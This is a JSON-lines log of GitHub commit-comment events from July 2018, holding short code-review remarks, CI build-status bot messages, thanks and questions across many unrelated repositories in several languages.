{"id":"7909823792","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29574382,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T02:05:58Z","updated_at":"2018-07-03T02:05:58Z","author_association":"NONE","body":"Congrats after almost a month of dry spell in 0 5 patches and after a week of your vacation. Glad your back!"}},"created_at":"2018-07-03T02:05:58Z"}
{"id":"7909824577","type":"CommitCommentEvent","actor":{"login":"kajuzna"},"repo":{"name":"paveldula123/paveldula123"},"payload":{"comment":{"id":29574386,"position":null,"line":null,"path":null,"commit_id":"ac656a06ef064c6a69a135aa649b896f0e79134e","created_at":"2018-07-03T02:06:16Z","updated_at":"2018-07-03T02:06:16Z","author_association":"NONE","body":"ac656a0"}},"created_at":"2018-07-03T02:06:16Z"}
{"id":"7909825881","type":"CommitCommentEvent","actor":{"login":"kajuzna"},"repo":{"name":"paveldula123/paveldula123"},"payload":{"comment":{"id":29574390,"position":null,"line":null,"path":null,"commit_id":"ac656a06ef064c6a69a135aa649b896f0e79134e","created_at":"2018-07-03T02:06:48Z","updated_at":"2018-07-03T02:06:48Z","author_association":"NONE","body":"Discusted"}},"created_at":"2018-07-03T02:06:48Z"}
{"id":"7909831017","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29574404,"position":null,"line":null,"path":null,"commit_id":"51751ea2249a576fecd37098884d13c0aefa9af9","created_at":"2018-07-03T02:08:52Z","updated_at":"2018-07-03T02:08:52Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-03T02:08:52Z"}
{"id":"7909835160","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29574424,"position":null,"line":null,"path":null,"commit_id":"51751ea2249a576fecd37098884d13c0aefa9af9","created_at":"2018-07-03T02:10:29Z","updated_at":"2018-07-03T02:10:29Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51751ea2249a576fecd37098884d13c0aefa9af9-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-03T02:10:29Z"}
{"id":"7909840554","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/publishing-app"},"payload":{"comment":{"id":29574433,"position":17,"line":17,"path":"app/controllers/posts_controller.rb","commit_id":"5c3f89efcf3e0ae5c014d73f625655fc03e0c48d","created_at":"2018-07-03T02:12:36Z","updated_at":"2018-07-03T02:12:36Z","author_association":"NONE","body":"Đối với string nên để nó trong dấu nháy đơn, ví dụ: `'Good morning!'`\r\nNháy kép sẽ dùng khi cần chèn một biến hoặc biểu thức vào string, ví dụ:\r\n`@his_name = 'John'`\r\n`puts \"Good morning, #{@his_name}\"`\r\nKhông bắt buộc nhưng cũng nên biết, vì RuboCop có check style này và một số khách hàng khó tính cũng để ý cái này.\r\nNếu em dùng RubyMine để code thì nó cũng sẽ warning cái này."}},"created_at":"2018-07-03T02:12:36Z"}
{"id":"7909845079","type":"CommitCommentEvent","actor":{"login":"Destiny609"},"repo":{"name":"Ludeon/RimWorld-SpanishLatin"},"payload":{"comment":{"id":29574437,"position":null,"line":null,"path":null,"commit_id":"d619dc65f08e515e2c86b8e7ba2cc4e2191f266a","created_at":"2018-07-03T02:14:27Z","updated_at":"2018-07-03T02:14:27Z","author_association":"CONTRIBUTOR","body":"@Ghrull Buenas colega acabo de tomarme el tiempo de leer el correo y te encontré allí, pues veras cada ves que hacen una actualización en RimWorld, si o si añaden una pequeña cosa o cambian otra, pues es cuestión de ir jugando y ver los cambios que hay, mi sugerencia es que tengas una partida de prueba y cada que hay actualización veas que cambio se hicieron, pero ahora estoy comprobando un programa que me pueda facilitar el trabajo para encontrar mas rápido lineas nuevas y lineas cambiadas.\r\nP.D: Un Saludo y si necesitan ayuda solo pídanme, ahora mismo estoy en vacaciones de invierno y me sobra el tiempo después del trabajo xD"}},"created_at":"2018-07-03T02:14:27Z"}
{"id":"7909845621","type":"CommitCommentEvent","actor":{"login":"JinhoYoo-icon-project"},"repo":{"name":"icon-project/icon_sdk_for_python"},"payload":{"comment":{"id":29574439,"position":134,"line":451,"path":"icx/utils.py","commit_id":"1bf96e1d4c0c987a0058e9f40b9fb137f62a46e6","created_at":"2018-07-03T02:14:39Z","updated_at":"2018-07-03T02:14:39Z","author_association":"COLLABORATOR","body":"OK, we'll post the issue. Thank you very much for your comment and contribution. "}},"created_at":"2018-07-03T02:14:39Z"}
{"id":"7909850411","type":"CommitCommentEvent","actor":{"login":"hxqqqqqq"},"repo":{"name":"fredsdc/redmine_backlogs"},"payload":{"comment":{"id":29574449,"position":null,"line":null,"path":null,"commit_id":"f07882300884a2c1fc310aa358529589575d2c44","created_at":"2018-07-03T02:16:29Z","updated_at":"2018-07-03T02:16:29Z","author_association":"NONE","body":"when i config backlogs. the submit button is gray all time. what the plugin's rules? could you help me?"}},"created_at":"2018-07-03T02:16:29Z"}
{"id":"7909855731","type":"CommitCommentEvent","actor":{"login":"AArnott"},"repo":{"name":"AArnott/vs-threading"},"payload":{"comment":{"id":29574460,"position":null,"line":null,"path":null,"commit_id":"357f279e44d150d2dbc305cf81fd549f2cbaed2d","created_at":"2018-07-03T02:18:33Z","updated_at":"2018-07-03T02:18:33Z","author_association":"OWNER","body":"That would finally explain why customers claim it was introduced in 15.7.1 (whereas I would have expected it to be a package bug in nuget.org, independent of the VS version)."}},"created_at":"2018-07-03T02:18:33Z"}
{"id":"7909860392","type":"CommitCommentEvent","actor":{"login":"hukacode"},"repo":{"name":"spring-guides/gs-multi-module"},"payload":{"comment":{"id":29574467,"position":null,"line":null,"path":null,"commit_id":"a4606ee679d367df2d3bf5812cdd96e86750c8ad","created_at":"2018-07-03T02:20:21Z","updated_at":"2018-07-03T02:20:21Z","author_association":"NONE","body":"Hi @gregturn \r\n\r\nI think we should use \"jar\".\r\nhttps://github.com/spring-guides/gs-multi-module/issues/10\r\n\r\nBest regards,\r\nHuka"}},"created_at":"2018-07-03T02:20:21Z"}
{"id":"7909861541","type":"CommitCommentEvent","actor":{"login":"jondoig"},"repo":{"name":"dret/JTT"},"payload":{"comment":{"id":29574469,"position":null,"line":null,"path":null,"commit_id":"010cfe2d650abf364dda54b71a98935611b78ad8","created_at":"2018-07-03T02:20:48Z","updated_at":"2018-07-03T02:20:48Z","author_association":"NONE","body":"Need to apply this also to the snippet in your [blog page](http://dret.typepad.com/dretblog/2015/11/gps-data-on-the-web.html)."}},"created_at":"2018-07-03T02:20:48Z"}
{"id":"7909868307","type":"CommitCommentEvent","actor":{"login":"jadamcrain"},"repo":{"name":"automatak/dnp3"},"payload":{"comment":{"id":29574483,"position":40,"line":65,"path":"cpp/libs/src/opendnp3/app/parsing/APDUHeaderParser.h","commit_id":"c21a51b174a297be0d6d2bfb17243df1ed628307","created_at":"2018-07-03T02:23:31Z","updated_at":"2018-07-03T02:23:31Z","author_association":"MEMBER","body":"The other two members that are not explicitly initialized, header and objects,  are *implicitly* initialized using their default constructors.\r\n\r\nIf you still run into problems, let me know your compiler/version and the error message."}},"created_at":"2018-07-03T02:23:31Z"}
{"id":"7909884800","type":"CommitCommentEvent","actor":{"login":"BigEarn86"},"repo":{"name":"dabonetn/linapple-pie"},"payload":{"comment":{"id":29574527,"position":null,"line":null,"path":null,"commit_id":"58bc727033722a3c5c8dd2f6dc8640f19ada0d5a","created_at":"2018-07-03T02:30:00Z","updated_at":"2018-07-03T02:30:00Z","author_association":"NONE","body":"I have installed from source through retropie's optional packages. Do I need to uninstall or can your directions be used to modify extensions. Thanks. "}},"created_at":"2018-07-03T02:30:00Z"}
{"id":"7909886480","type":"CommitCommentEvent","actor":{"login":"jogs78"},"repo":{"name":"jogs78/SII"},"payload":{"comment":{"id":29574534,"position":null,"line":null,"path":null,"commit_id":"d3bd0cb128e77f6b043c8393b58ceef0bbd04eb4","created_at":"2018-07-03T02:30:36Z","updated_at":"2018-07-03T02:30:36Z","author_association":"OWNER","body":"conacyt no va"}},"created_at":"2018-07-03T02:30:36Z"}
{"id":"7909889905","type":"CommitCommentEvent","actor":{"login":"notionparallax"},"repo":{"name":"bvn-architecture/techtree"},"payload":{"comment":{"id":29574542,"position":null,"line":null,"path":null,"commit_id":"6ec458bf5b0ddf6478f6aa14bf27dcf2061a13ed","created_at":"2018-07-03T02:31:48Z","updated_at":"2018-07-03T02:31:48Z","author_association":"CONTRIBUTOR","body":"any idea why git thinks that every line has changed?"}},"created_at":"2018-07-03T02:31:48Z"}
{"id":"7909890754","type":"CommitCommentEvent","actor":{"login":"jogs78"},"repo":{"name":"jogs78/SII"},"payload":{"comment":{"id":29574545,"position":6,"line":6,"path":"resources/views/sistema/Coordinador.blade.php","commit_id":"8d829c5915cb56875c36bb7218104bdd978725dc","created_at":"2018-07-03T02:32:07Z","updated_at":"2018-07-03T02:32:07Z","author_association":"OWNER","body":"En lugar de style puedes crear un clas"}},"created_at":"2018-07-03T02:32:07Z"}
{"id":"7909906391","type":"CommitCommentEvent","actor":{"login":"qidiso"},"repo":{"name":"qidiso/mobilefacenet-V2"},"payload":{"comment":{"id":29574573,"position":null,"line":null,"path":null,"commit_id":"c8919bb412930cbcf8835a102b21637621c561f8","created_at":"2018-07-03T02:37:44Z","updated_at":"2018-07-03T02:37:44Z","author_association":"OWNER","body":"lr=0.001"}},"created_at":"2018-07-03T02:37:44Z"}
{"id":"7909907146","type":"CommitCommentEvent","actor":{"login":"furiousjhin"},"repo":{"name":"furiousjhin/album"},"payload":{"comment":{"id":29574576,"position":null,"line":null,"path":null,"commit_id":"c0eda11b7b5538a7f6dd0b2b8e62ba7a6efe383c","created_at":"2018-07-03T02:37:57Z","updated_at":"2018-07-03T02:37:57Z","author_association":"OWNER","body":"테스트"}},"created_at":"2018-07-03T02:37:57Z"}
{"id":"7909912147","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29574583,"position":null,"line":null,"path":null,"commit_id":"de3daacd3abf2c6c6a131e705aa23af0297d83dd","created_at":"2018-07-03T02:39:48Z","updated_at":"2018-07-03T02:39:48Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-03T02:39:48Z"}
{"id":"7909916539","type":"CommitCommentEvent","actor":{"login":"Harest"},"repo":{"name":"ensingm2/saliengame_idler"},"payload":{"comment":{"id":29574593,"position":null,"line":null,"path":null,"commit_id":"71ef7e345edda05de2c7c4a78b1da21fedf0d0fe","created_at":"2018-07-03T02:41:21Z","updated_at":"2018-07-03T02:41:21Z","author_association":"COLLABORATOR","body":"Less progress than 0 ? This code snippet was added because when you join a new planet since the zone 0 on planet 38 issue, all zones are at progress 0%. As explained in the comment."}},"created_at":"2018-07-03T02:41:21Z"}
{"id":"7909917488","type":"CommitCommentEvent","actor":{"login":"ItoTakaaki"},"repo":{"name":"ItoTakaaki/sort"},"payload":{"comment":{"id":29574598,"position":null,"line":null,"path":null,"commit_id":"04f6d392f863d8e32bbd78374f5aff55bef05cab","created_at":"2018-07-03T02:41:42Z","updated_at":"2018-07-03T02:41:42Z","author_association":"OWNER","body":"エラーを出してしまいましたが出来た分を提出します"}},"created_at":"2018-07-03T02:41:42Z"}
{"id":"7909920205","type":"CommitCommentEvent","actor":{"login":"cosmicmeow"},"repo":{"name":"cosmicmeow/cosmicmeow.github.io"},"payload":{"comment":{"id":29574602,"position":null,"line":null,"path":null,"commit_id":"c8e7171125dd7b6d999a097165b132ca82faa998","created_at":"2018-07-03T02:42:42Z","updated_at":"2018-07-03T02:42:42Z","author_association":"OWNER","body":"--"}},"created_at":"2018-07-03T02:42:42Z"}
{"id":"7909921291","type":"CommitCommentEvent","actor":{"login":"calebsander"},"repo":{"name":"ASCIT/donut"},"payload":{"comment":{"id":29574606,"position":5,"line":67,"path":"donut/modules/flights/routes.py","commit_id":"7778011a7abdda272eff19dbdfee320da520b9cb","created_at":"2018-07-03T02:43:07Z","updated_at":"2018-07-03T02:43:07Z","author_association":"MEMBER","body":"`if not helpers.join_ride(...):` would be more consise"}},"created_at":"2018-07-03T02:43:07Z"}
{"id":"7909921768","type":"CommitCommentEvent","actor":{"login":"paulk-asert"},"repo":{"name":"apache/groovy"},"payload":{"comment":{"id":29574608,"position":9,"line":673,"path":"src/main/java/org/codehaus/groovy/ast/tools/GenericsUtils.java","commit_id":"3143944c30f340208be40e9452e2e5be2e4a33be","created_at":"2018-07-03T02:43:16Z","updated_at":"2018-07-03T02:43:16Z","author_association":"CONTRIBUTOR","body":"Better to use SystemUtil#getSystemPropertySafe?"}},"created_at":"2018-07-03T02:43:16Z"}
{"id":"7909922089","type":"CommitCommentEvent","actor":{"login":"ystarlongzi"},"repo":{"name":"Tencent/wepy"},"payload":{"comment":{"id":29574609,"position":45,"line":242,"path":"packages/wepy/src/component.js","commit_id":"b5b7f7fa66f5d195d7422ae902e0bd2bd817e47c","created_at":"2018-07-03T02:43:21Z","updated_at":"2018-07-03T02:43:21Z","author_association":"CONTRIBUTOR","body":"@cuijiemmx @Gcaufy \r\n\r\n这里移除 `com.$mixins.forEach()` 和 `com.$apply()` 部分的代码，出发点是什么？"}},"created_at":"2018-07-03T02:43:21Z"}
{"id":"7909924179","type":"CommitCommentEvent","actor":{"login":"dret"},"repo":{"name":"dret/JTT"},"payload":{"comment":{"id":29574614,"position":null,"line":null,"path":null,"commit_id":"010cfe2d650abf364dda54b71a98935611b78ad8","created_at":"2018-07-03T02:44:08Z","updated_at":"2018-07-03T02:44:08Z","author_association":"OWNER","body":"On 2018-07-02 19:20, Jonathan Doig wrote:\n> Need to apply this also to the snippet in your blog page \n> <http://dret.typepad.com/dretblog/2015/11/gps-data-on-the-web.html>.\n\nthanks for noticing and letting me know! done.\n"}},"created_at":"2018-07-03T02:44:08Z"}
{"id":"7909929551","type":"CommitCommentEvent","actor":{"login":"landley"},"repo":{"name":"landley/toybox"},"payload":{"comment":{"id":29574624,"position":null,"line":null,"path":null,"commit_id":"d376344bfd834c73347b8e523231438969b7220f","created_at":"2018-07-03T02:46:01Z","updated_at":"2018-07-03T02:46:01Z","author_association":"OWNER","body":"On 06/29/2018 01:44 AM, Ricardo wrote:\n> Shouldn't it be Access/Modify/Change ? This is the convention used in line 187\n> <https://github.com/landley/toybox/blob/master/toys/other/stat.c#L187>...\n\nDon't \"modify\" and \"change\" mean basically the same thing?\n\nTechnically you can update ctime with things like chown or chmod, but mostly it\nsays when the file was created. Seems the most useful terse description of what\nthe field usually means.\n\nRob\n\nP.S. Yes I'm aware of posix's opinion, but it's not always helpful.\n"}},"created_at":"2018-07-03T02:46:01Z"}
{"id":"7909934526","type":"CommitCommentEvent","actor":{"login":"sunnybbpp"},"repo":{"name":"sunnybbpp/work_nkb"},"payload":{"comment":{"id":29574631,"position":null,"line":null,"path":null,"commit_id":"cdcdd5b73af6f6487f05c399a7d65f71633c4cc8","created_at":"2018-07-03T02:47:40Z","updated_at":"2018-07-03T02:47:40Z","author_association":"OWNER","body":"[某某餐厅附近几公里门店sql.txt](https://github.com/sunnybbpp/work_nkb/files/2157453/sql.txt)\r\n"}},"created_at":"2018-07-03T02:47:40Z"}
{"id":"7909935710","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29574637,"position":null,"line":null,"path":null,"commit_id":"e3126a36c9ec0c51dd1722537cbc1d031976bd51","created_at":"2018-07-03T02:48:07Z","updated_at":"2018-07-03T02:48:07Z","author_association":"COLLABORATOR","body":"谢谢"}},"created_at":"2018-07-03T02:48:07Z"}
{"id":"7909937126","type":"CommitCommentEvent","actor":{"login":"wangwei-anye"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":29574638,"position":5,"line":18,"path":"benchmarks/reorder-list/index.html","commit_id":"38d5459e109a83b4992168c673403503278ff3c1","created_at":"2018-07-03T02:48:36Z","updated_at":"2018-07-03T02:48:36Z","author_association":"NONE","body":"44444"}},"created_at":"2018-07-03T02:48:36Z"}
{"id":"7909938129","type":"CommitCommentEvent","actor":{"login":"slide"},"repo":{"name":"IronLanguages/ironpython3"},"payload":{"comment":{"id":29574639,"position":67,"line":415,"path":"Src/IronPython.Modules/_ctypes/CFuncPtr.cs","commit_id":"1d75d720a4370cb7983a7bd02627503c514f4432","created_at":"2018-07-03T02:48:57Z","updated_at":"2018-07-03T02:48:57Z","author_association":"MEMBER","body":"Why not use interpolation here?"}},"created_at":"2018-07-03T02:48:57Z"}
{"id":"7909939072","type":"CommitCommentEvent","actor":{"login":"wangwei-anye"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":29574641,"position":3,"line":17,"path":"benchmarks/reorder-list/index.html","commit_id":"38d5459e109a83b4992168c673403503278ff3c1","created_at":"2018-07-03T02:49:18Z","updated_at":"2018-07-03T02:49:18Z","author_association":"NONE","body":"58555"}},"created_at":"2018-07-03T02:49:18Z"}
{"id":"7909945427","type":"CommitCommentEvent","actor":{"login":"sashas777"},"repo":{"name":"tlc033/bug-from-email"},"payload":{"comment":{"id":29574654,"position":null,"line":null,"path":null,"commit_id":"de051563ca36030ea8ddb0b36542ebf406828238","created_at":"2018-07-03T02:51:41Z","updated_at":"2018-07-03T02:51:41Z","author_association":"NONE","body":"@tlc033 \r\n\r\nThanks. It has been fixed in the new release"}},"created_at":"2018-07-03T02:51:41Z"}
{"id":"7909953055","type":"CommitCommentEvent","actor":{"login":"danielsun1106"},"repo":{"name":"apache/groovy"},"payload":{"comment":{"id":29574669,"position":9,"line":673,"path":"src/main/java/org/codehaus/groovy/ast/tools/GenericsUtils.java","commit_id":"3143944c30f340208be40e9452e2e5be2e4a33be","created_at":"2018-07-03T02:54:29Z","updated_at":"2018-07-03T02:54:29Z","author_association":"MEMBER","body":"Done.\r\nhttps://github.com/apache/groovy/commit/c7272cfa2571a4beb5974d044127bbafaf1e71d9"}},"created_at":"2018-07-03T02:54:29Z"}
{"id":"7909961194","type":"CommitCommentEvent","actor":{"login":"recklessop"},"repo":{"name":"recklessop/zplanner"},"payload":{"comment":{"id":29574684,"position":null,"line":null,"path":null,"commit_id":"b8d3ee28ebbb44cb0982ac6692f4e30fc62e20a6","created_at":"2018-07-03T02:57:41Z","updated_at":"2018-07-03T02:57:41Z","author_association":"OWNER","body":"Before this update, if a user tried to update the list of VMs new VM's would not be added to the inventory because the SQL query would fail once a duplicate VM was already found in the database. Now the query will ignore duplicates."}},"created_at":"2018-07-03T02:57:41Z"}
{"id":"7909965559","type":"CommitCommentEvent","actor":{"login":"allenwakeup"},"repo":{"name":"davidcava/shadowsocks-libev-dsm"},"payload":{"comment":{"id":29574688,"position":null,"line":null,"path":null,"commit_id":"9a2b727c8128d8432ba756304b09ba1621a0cffd","created_at":"2018-07-03T02:59:24Z","updated_at":"2018-07-03T02:59:24Z","author_association":"NONE","body":"Okay, I installed python-pip instead of that. works fine for me ^_^"}},"created_at":"2018-07-03T02:59:24Z"}
{"id":"7909966204","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-minos"},"payload":{"comment":{"id":29574689,"position":null,"line":null,"path":null,"commit_id":"5058807d51a111923684fd25f33106d635d7e0f8","created_at":"2018-07-03T02:59:40Z","updated_at":"2018-07-03T02:59:40Z","author_association":"OWNER","body":"#47 "}},"created_at":"2018-07-03T02:59:40Z"}
{"id":"7914712228","type":"CommitCommentEvent","actor":{"login":"kranar"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29586361,"position":7,"line":91,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/dashboard_page.tsx","commit_id":"4ba506236234cf60a6ac7cc361fd4c74ef4097f1","created_at":"2018-07-03T20:00:09Z","updated_at":"2018-07-03T20:00:09Z","author_association":"COLLABORATOR","body":"Does it work in Safari?"}},"created_at":"2018-07-03T20:00:09Z"}
{"id":"7914713066","type":"CommitCommentEvent","actor":{"login":"goodsoft"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29586368,"position":34,"line":185,"path":"ui/vty/src/Ariadne/UI/Vty/Widget.hs","commit_id":"cb0193a86b089a34773b706429ef58bd8f6bee8d","created_at":"2018-07-03T20:00:19Z","updated_at":"2018-07-03T20:00:19Z","author_association":"CONTRIBUTOR","body":"This is one of the rough edges.\r\nThe thing is, I want this whole block of methods to work on two different monad stacks — during widget initialization and during event handling.\r\nIt should probably be remade into a typeclass, but I'm not yet sure, how."}},"created_at":"2018-07-03T20:00:19Z"}
{"id":"7914715178","type":"CommitCommentEvent","actor":{"login":"nicola-spire"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29586371,"position":7,"line":91,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/dashboard_page.tsx","commit_id":"4ba506236234cf60a6ac7cc361fd4c74ef4097f1","created_at":"2018-07-03T20:00:48Z","updated_at":"2018-07-03T20:00:48Z","author_association":"COLLABORATOR","body":"Yup! I checked on mac, and iphone. "}},"created_at":"2018-07-03T20:00:48Z"}
{"id":"7914716384","type":"CommitCommentEvent","actor":{"login":"nicola-spire"},"repo":{"name":"eidolonsystems/nexus"},"payload":{"comment":{"id":29586373,"position":7,"line":91,"path":"Applications/web_portal/web_app/library/source/pages/dashboard_page/dashboard_page.tsx","commit_id":"4ba506236234cf60a6ac7cc361fd4c74ef4097f1","created_at":"2018-07-03T20:01:05Z","updated_at":"2018-07-03T20:01:05Z","author_association":"COLLABORATOR","body":"Also, updated the demo"}},"created_at":"2018-07-03T20:01:05Z"}
{"id":"7914719199","type":"CommitCommentEvent","actor":{"login":"teracube"},"repo":{"name":"iZeaoGamer/PocketMine-Plugins"},"payload":{"comment":{"id":29586380,"position":null,"line":null,"path":null,"commit_id":"54de3b1ecc1124abc09c98a873fc83dedee48231","created_at":"2018-07-03T20:01:45Z","updated_at":"2018-07-03T20:01:45Z","author_association":"NONE","body":"@iZeaoGamer \r\ncould you please update on API 3.0.0 \r\nthanks"}},"created_at":"2018-07-03T20:01:45Z"}
{"id":"7914720150","type":"CommitCommentEvent","actor":{"login":"javascriptkitty"},"repo":{"name":"javascriptkitty/js-exercices"},"payload":{"comment":{"id":29586385,"position":null,"line":null,"path":null,"commit_id":"b800ad3510621558d0e82213a1e6d7923581c327","created_at":"2018-07-03T20:01:58Z","updated_at":"2018-07-03T20:01:58Z","author_association":"OWNER","body":"hmm when i use .split(\"\") it removes all the spaces in a string. what to do if i want to keep spaces?"}},"created_at":"2018-07-03T20:01:58Z"}
{"id":"7914722001","type":"CommitCommentEvent","actor":{"login":"teracube"},"repo":{"name":"ZPlayzMCPE/CombatLogger-1"},"payload":{"comment":{"id":29586388,"position":null,"line":null,"path":null,"commit_id":"94e245168b2147d3e9c07275578d6da1fd7d1d0c","created_at":"2018-07-03T20:02:24Z","updated_at":"2018-07-03T20:02:24Z","author_association":"NONE","body":"@ZPlayzMCPE \r\ncould you please update on API 3.0.0 \r\nthanks"}},"created_at":"2018-07-03T20:02:24Z"}
{"id":"7914722531","type":"CommitCommentEvent","actor":{"login":"rhys19"},"repo":{"name":"rhys19/roleplay-toolbox"},"payload":{"comment":{"id":29586390,"position":null,"line":null,"path":null,"commit_id":"486fafd34c571dd75be812ee272b29bda0198ee5","created_at":"2018-07-03T20:02:32Z","updated_at":"2018-07-03T20:02:32Z","author_association":"OWNER","body":"Fixed the issue where people rename the resources!"}},"created_at":"2018-07-03T20:02:32Z"}
{"id":"7914724462","type":"CommitCommentEvent","actor":{"login":"goodsoft"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29586394,"position":180,"line":241,"path":"ui/vty/src/Ariadne/UI/Vty/Widget/Wallet.hs","commit_id":"cb0193a86b089a34773b706429ef58bd8f6bee8d","created_at":"2018-07-03T20:03:01Z","updated_at":"2018-07-03T20:03:01Z","author_association":"CONTRIBUTOR","body":"I use it for making a lens into `Map` item, so that it is `bla-bla -> Text`, not `bla-bla -> Maybe Text`\r\n\r\n`widgetParentLens` just creates a new lens, whose getters and setters are modified to work on `WidgetInfo` structure instead of its `widgetState` field."}},"created_at":"2018-07-03T20:03:01Z"}
{"id":"7914728489","type":"CommitCommentEvent","actor":{"login":"bttrfngrs"},"repo":{"name":"bttrfngrs/helloworld-java-maven"},"payload":{"comment":{"id":29586405,"position":null,"line":null,"path":null,"commit_id":"740e57020668a3c5609a617271ee25ba212f862b","created_at":"2018-07-03T20:03:56Z","updated_at":"2018-07-03T20:03:56Z","author_association":"OWNER","body":"lets go back"}},"created_at":"2018-07-03T20:03:56Z"}
{"id":"7914728546","type":"CommitCommentEvent","actor":{"login":"myhro"},"repo":{"name":"myhro/openvpn-docker"},"payload":{"comment":{"id":29586407,"position":9,"line":9,"path":"Makefile","commit_id":"8a3fd76a6907b9f53cf7d03add045ee7771aa60c","created_at":"2018-07-03T20:03:57Z","updated_at":"2018-07-03T20:03:57Z","author_association":"OWNER","body":"That's true. 🙂 "}},"created_at":"2018-07-03T20:03:57Z"}
{"id":"7914730157","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29586410,"position":null,"line":null,"path":null,"commit_id":"c5b712264880306934f235f51cf204ab4d407163","created_at":"2018-07-03T20:04:17Z","updated_at":"2018-07-03T20:04:17Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-174](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-174).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-174-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T20:04:17Z"}
{"id":"7914731208","type":"CommitCommentEvent","actor":{"login":"pandameister"},"repo":{"name":"javascriptkitty/js-exercices"},"payload":{"comment":{"id":29586413,"position":null,"line":null,"path":null,"commit_id":"b800ad3510621558d0e82213a1e6d7923581c327","created_at":"2018-07-03T20:04:32Z","updated_at":"2018-07-03T20:04:32Z","author_association":"COLLABORATOR","body":"Are you sure?\r\n<img width=\"360\" alt=\"screen shot 2018-07-03 at 1 03 35 pm\" src=\"https://user-images.githubusercontent.com/16979465/42242098-9b5824c2-7ec1-11e8-9a50-df3fae68778c.png\">\r\n"}},"created_at":"2018-07-03T20:04:32Z"}
{"id":"7914732109","type":"CommitCommentEvent","actor":{"login":"WandersonAlves"},"repo":{"name":"WandersonAlves/code-firefighter"},"payload":{"comment":{"id":29586415,"position":null,"line":null,"path":null,"commit_id":"94f07e877a49822c1a51d34f2b3354fefb776663","created_at":"2018-07-03T20:04:45Z","updated_at":"2018-07-03T20:04:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Connection closes after auth make a connection](https://trello.com/c/c3JdtB6e/4-connection-closes-after-auth-make-a-connection)"}},"created_at":"2018-07-03T20:04:45Z"}
{"id":"7914734220","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29586417,"position":12,"line":12,"path":"HomeWork1/HW1a.java","commit_id":"7283eea766f831f05f1adbbfa304c24e7052c142","created_at":"2018-07-03T20:05:15Z","updated_at":"2018-07-03T20:05:15Z","author_association":"OWNER","body":"краще назвати змінні perimeter, area, radius і тоді не потрібно буде коментарів"}},"created_at":"2018-07-03T20:05:15Z"}
{"id":"7914748755","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29586441,"position":null,"line":null,"path":null,"commit_id":"a5b0e187a0bfbaa47727d68f169b3c113d5527e7","created_at":"2018-07-03T20:08:38Z","updated_at":"2018-07-03T20:08:38Z","author_association":"MEMBER","body":"This is out of scope."}},"created_at":"2018-07-03T20:08:38Z"}
